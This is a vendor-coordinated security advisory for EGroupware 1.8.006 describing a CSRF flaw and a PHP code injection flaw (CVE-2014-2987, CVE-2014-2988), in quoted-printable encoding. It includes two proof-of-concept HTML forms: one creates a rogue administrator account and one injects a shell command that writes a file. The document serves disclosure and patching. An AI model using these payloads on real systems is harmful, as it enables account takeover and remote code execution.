Advisory ID: HTB23212 Product: EGroupware Vendor: http://www.egroupware.org/ Vulnerable Version(s): 1.8.006 community edition and probably prior Tested Version: 1.8.006 community edition Advisory Publication: April 23, 2014 [without technical details] Vendor Notification: April 23, 2014=20 Vendor Patch: May 6, 2014=20 Public Disclosure: May 14, 2014=20 Vulnerability Type: Cross-Site Request Forgery [CWE-352], Code Injection [C= WE-94] CVE References: CVE-2014-2987, CVE-2014-2988 Risk Level: High=20 CVSSv2 Base Scores: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P), 8.5 (AV:N/AC:M/Au:S/C= :C/I:C/A:C) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://w= ww.htbridge.com/advisory/ )=20 ---------------------------------------------------------------------------= -------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered CSRF and Remote Code Exec= ution vulnerabilities in EGroupware, which can be exploited by remote attac= ker to gain full control over the application and compromise vulnerable sys= tem. 1) =D0=A1ross-Site Request Forgery (CSRF) in EGroupware: CVE-2014-2987 The vulnerability exists due to insufficient verification of the HTTP reque= st origin. A remote attacker can create a new user account with administrat= ive privileges by tricking logged-in Groupware administrator to visit a mal= icious pages with CSRF exploit.=20 Simple CSRF exploit below creates new administrator with login "immuniweb" = and password "immuniweb": <form action=3D"http://[host]/index.php?menuaction=3Dadmin.uiaccounts.add_u= ser" method=3D"post" name=3D"main"> <input type=3D"hidden" name=3D"account_lid" value=3D"immuniweb"> <input type=3D"hidden" name=3D"account_status" value=3D"A"> <input type=3D"hidden" name=3D"account_firstname" value=3D"firstname"> <input type=3D"hidden" name=3D"account_lastname" value=3D"lastname"> <input type=3D"hidden" name=3D"account_passwd" value=3D"immuniweb"> <input type=3D"hidden" name=3D"account_passwd_2" value=3D"immuniweb"> <input type=3D"hidden" name=3D"changepassword" value=3D"1"> <input type=3D"hidden" name=3D"expires" value=3D"2014/04/29"> <input type=3D"hidden" name=3D"never_expires" value=3D"True"> <input type=3D"hidden" name=3D"account_email" value=3D"immuniweb@immuniweb= =2Ecom"> <input type=3D"hidden" name=3D"account_groups[]" value=3D"-2"> <input type=3D"hidden" name=3D"account_primary_group" value=3D"-2"> <input type=3D"hidden" name=3D"submit" value=3D"Add"> <input type=3D"submit" id=3D"btn"> </form> 2) Code Injection in EGroupware: CVE-2014-2988 The vulnerability exists due to insufficient sanitisation of input data pas= sed via the HTTP POST "newsettings" parameter to PHP function "call_user_fu= nc()". A remote attacker with administrative privileges can inject and exec= ute arbitrary PHP code on the target system with privileges of the webserve= r.=20 This vulnerability can be exploited in pair with the above-described CSRF v= ulnerability. The following exploitation example writes "immuniweb" word into file "/1.ph= p": <form action=3D"http://[host]/index.php?menuaction=3Dadmin.uiconfig.index&a= ppname=3Dphpbrain" method=3D"post" name=3D"main"> <input type=3D"hidden" name=3D"newsettings[system]" value=3D"echo immuniweb= >1.php"> <input type=3D"hidden" name=3D"submit" value=3D"Save"> <input type=3D"submit" id=3D"btn"> </form> ---------------------------------------------------------------------------= -------------------- Solution: Update to EGroupware version 1.8.007 More Information: http://www.egroupware.org/forum#nabble-td3997580 http://www.egroupware.org/changelog ---------------------------------------------------------------------------= -------------------- References: [1] High-Tech Bridge Advisory HTB23212 - https://www.htbridge.com/advisory/= HTB23212 - CSRF and Remote Code Execution in EGroupware. [2] EGroupware - http://www.egroupware.org/ - EGroupware is the leading ope= n source collaboration tool and the top choice for big enterprises, SMEs an= d teams within and across organizations all over the globe. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - in= ternational in scope and free for public use, CVE=C2=AE is a dictionary of = publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to = developers and security practitioners, CWE is a formal list of software wea= kness types. [5] ImmuniWeb=C2=AE SaaS - https://www.htbridge.com/immuniweb/ - hybrid of = manual web application penetration test and cutting-edge vulnerability scan= ner available online via a Software-as-a-Service (SaaS) model. ---------------------------------------------------------------------------= -------------------- Disclaimer: The information provided in this Advisory is provided "as is" a= nd without any warranty of any kind. Details of this Advisory may be update= d in order to provide as accurate information as possible. The latest versi= on of the Advisory is available on web page [1] in the References.